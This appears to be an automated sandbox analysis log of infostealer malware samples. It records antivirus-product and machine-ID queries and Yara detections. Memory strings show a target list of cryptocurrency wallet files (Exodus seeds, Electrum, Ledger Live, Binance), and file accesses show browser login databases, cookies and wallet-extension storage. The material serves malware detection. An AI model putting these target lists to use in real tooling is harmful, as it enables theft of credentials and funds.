                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Code function: 2_2_6C53A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_6C53A8DC
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Code function: 2_2_6C488390 NSS_GetVersion,2_2_6C488390
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: 5EfYBe3nch.exe, 00000000.00000003.1785170775.0000000005C21000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\YQNZByFp\jyidkjkfhjawd.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: 14.2.skotes.exe.fa0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.GIIIIJDHJE.exe.780000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 44.2.483d2fa8a0d53818306efeb32d3.exe.5f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.31FYMQUCQX14ZVCZU2HAYNV7V.exe.480000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 73.2.483d2fa8a0d53818306efeb32d3.exe.5f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 58.2.483d2fa8a0d53818306efeb32d3.exe.5f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.skotes.exe.fa0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 43.2.483d2fa8a0d53818306efeb32d3.exe.5f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.skotes.exe.fa0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 0000002B.00000002.2673808874.00000000005F1000.00000040.00000001.01000000.0000001A.sdmp, type: MEMORY
Source: Yara match | File source: 00000049.00000002.2882969985.00000000005F1000.00000040.00000001.01000000.0000001A.sdmp, type: MEMORY
Source: Yara match | File source: 0000003A.00000002.2789901199.00000000005F1000.00000040.00000001.01000000.0000001A.sdmp, type: MEMORY
Source: Yara match | File source: 0000002C.00000002.2780754932.00000000005F1000.00000040.00000001.01000000.0000001A.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1998815042.0000000000481000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2287015642.0000000000781000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2049080797.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2048763354.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\10DCQZI[1].exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\1027002001\10DCQZI.exe, type: DROPPED
Source: Yara match | File source: Process Memory Space: 5EfYBe3nch.exe PID: 7268, type: MEMORYSTR
Source: Yara match | File source: 00000010.00000002.2504667961.00000000006E1000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.2453745116.0000000004E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: iSHmPkn.exe PID: 7540, type: MEMORYSTR
Source: Yara match | File source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2278140862.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2273078519.0000000000731000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: DLTDCR8UJINP8YM8Y.exe PID: 7656, type: MEMORYSTR
Source: 5EfYBe3nch.exe, 00000000.00000003.1726793450.0000000001463000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Electrum-LTC
Source: 5EfYBe3nch.exe, 00000000.00000003.1726694915.00000000014B2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: 1520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":2097
Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007FC000.00000040.00000001.01000000.00000006.sdmp | String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 5EfYBe3nch.exe, 00000000.00000003.1774596818.00000000014B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: 5EfYBe3nch.exe, 00000000.00000003.1726694915.00000000014B2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: a%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wa
Source: 5EfYBe3nch.exe, 00000000.00000003.1726694915.00000000014B2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: re"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"]_
Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F68000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\passphrase.jsone-N
Source: 5EfYBe3nch.exe, 00000000.00000003.1774596818.00000000014B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Exodus
Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F68000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: 16.113Users\user\AppData\Roaming\Binance\simple-storage.json_
Source: 5EfYBe3nch.exe, 00000000.00000003.1774596818.00000000014B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\seed.seco*
Source: 5EfYBe3nch.exe, 00000000.00000003.1774596818.00000000014B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
